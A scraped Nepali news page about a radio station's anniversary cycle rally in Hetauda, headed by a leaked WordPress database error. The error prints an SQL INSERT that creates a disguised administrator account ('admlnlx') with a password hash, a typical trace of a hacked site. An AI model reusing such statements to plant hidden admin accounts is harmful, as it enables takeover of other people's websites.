WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8vbEj0AJUhc2qdmwGkrYYnGvl0/db.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 03:28:30', '', 'admlnlx', 'admlnlx')
हेटौंडा ,फागुन ५ –
रेडियो थाहा सञ्चार ९ वर्ष पूरा गरी १० औं वर्षमा प्रवेश गरेको अवसरमा आयोजित सप्ताहव्यापी कार्यक्रम अन्तर्गत बिहीबार साइकल र्याली गरिएको छ। “स्वास्थ्यको लागि साइकल, पर्यावरणको लागि साइकल” भन्ने नारा सहित हेटौंडाको बुद्ध चोकबाट सुरु भएको र्याली हेटौडा ६ को चुच्चेखोलामा पुगी पुन बुद्ध चोकमा आएर सकिएको थियो।
२३ किलोमिटरको साइकल यात्रामा हेटौंडा राईडर्स क्लबका साइकलयात्रीहरु पनि सहभागी थियो। कार्यक्रममा रेडियो थाहा सञ्चारका प्रवन्ध निर्देशक अरुणराज सुमार्गी, सञ्चालक अंकिता सुमार्गी, राइडर्स क्लब मकवानपुरका अध्यक्ष दिपेन्द्रचन्द ठकुरी लगायत ३० जना साइकल यात्रीहरु सहभागी थिए। सप्ताहव्यापी कार्यक्रम अन्तर्गत शुक्रबार फागुन ६ गते हेटौंडामा बृहत रक्तदान कार्यक्रमको आयोजना गरिने रेडियोले जानकारी दिएको छ।